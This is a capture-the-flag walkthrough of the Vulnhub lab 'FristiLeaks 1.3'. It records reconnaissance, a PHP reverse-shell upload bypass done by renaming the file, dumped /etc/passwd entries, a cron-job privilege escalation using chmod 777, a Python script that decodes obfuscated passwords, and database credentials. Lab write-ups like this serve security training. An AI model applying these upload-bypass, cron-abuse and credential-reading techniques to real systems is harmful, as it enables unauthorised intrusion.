Tuesday, October 8, 2019

Vulnhub: FristiLeaks: 1.3

source: https://www.vulnhub.com/entry/fristileaks-13,133/

192.168.1.24

nmap:
80/tcp open  http    Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)

maybe CentOS 6.8

nikto:
/cola
/sisi
/beer
/robots.txt
/icons
/images
/icons/README

login page: http://192.168.1.24/fristi/

from source code:
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz


and two base64-encoded pictures.


username eezeepz, password keKkeKKeKKeKkEkkEk


upload bypass:

rename rs.php to rs.php.png

CentOS 6.7
Linux localhost.localdomain 2.6.32-573.8.1.el6.x86_64 #1 SMP Tue Nov 10 18:01:38 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux


eezeepz:x:500:500::/home/eezeepz:/bin/bash
admin:x:501:501::/home/admin:/bin/bash
fristigod:x:502:502::/var/fristigod:/bin/bash

fristi:x:503:100::/var/www:/sbin/nologin

cat /var/www/notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete the important stuff. -jerry

cat /home/eezeepz/notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.

- Jerry

privilege escalation:
echo "/home/admin/chmod -R 777 /home/admin" > /tmp/runthis
cd /home/admin
cat whoisyourgodnow.txt
=RFn0AKnlMHMPIzpyuTI0ITG
cat cryptedpass.txt
mVGZ3O3omkJLmy2pcuTq
cat cryptpass.py
rot13 decode->reverse->base64 decode

mVGZ3O3omkJLmy2pcuTq->thisisalsopw123
=RFn0AKnlMHMPIzpyuTI0ITG->LetThereBeFristi!
username fristigod, password LetThereBeFristi!
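The decode chain noted above, written out as an added Python example (this is my code, not the VM's cryptpass.py). It undoes the three steps in reverse order and checks the two strings quoted from the VM's files; the point is that this "encryption" is keyless obfuscation, so anyone who reads the script recovers the passwords.

```python
import base64
import codecs


def encode_like_cryptpass(plaintext: str) -> str:
    """Forward chain as the notes describe it: base64 -> reverse -> rot13."""
    b64 = base64.b64encode(plaintext.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_cryptpass(token: str) -> str:
    """Undo the chain: rot13 -> reverse -> base64 decode.

    rot13 leaves digits and '=' untouched, which is why a leading '='
    (the base64 padding, now at the front after the reverse) survives.
    """
    unrot = codecs.decode(token, "rot13")
    b64 = unrot[::-1]
    return base64.b64decode(b64).decode()


# The two strings taken from whoisyourgodnow.txt and cryptedpass.txt,
# as quoted in the notes above, with the plaintexts the notes give.
SAMPLES = {
    "mVGZ3O3omkJLmy2pcuTq": "thisisalsopw123",
    "=RFn0AKnlMHMPIzpyuTI0ITG": "LetThereBeFristi!",
}


def check_samples() -> bool:
    """True if every sample decodes and re-encodes to the original token."""
    return all(
        decode_cryptpass(tok) == pw and encode_like_cryptpass(pw) == tok
        for tok, pw in SAMPLES.items()
    )


if __name__ == "__main__":
    for tok in SAMPLES:
        print(f"{tok} -> {decode_cryptpass(tok)}")
    print("round-trip ok:", check_samples())
```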

switch to tty:
python -c "import pty; pty.spawn('/bin/bash')"

head /var/www/html/fristi/checklogin.php
<?php

ob_start();
$host="localhost"; // Host name
$username="eezeepz"; // Mysql username
$password="4ll3maal12#"; // Mysql password
$db_name="hackmenow"; // Database name
$tbl_name="members"; // Table name
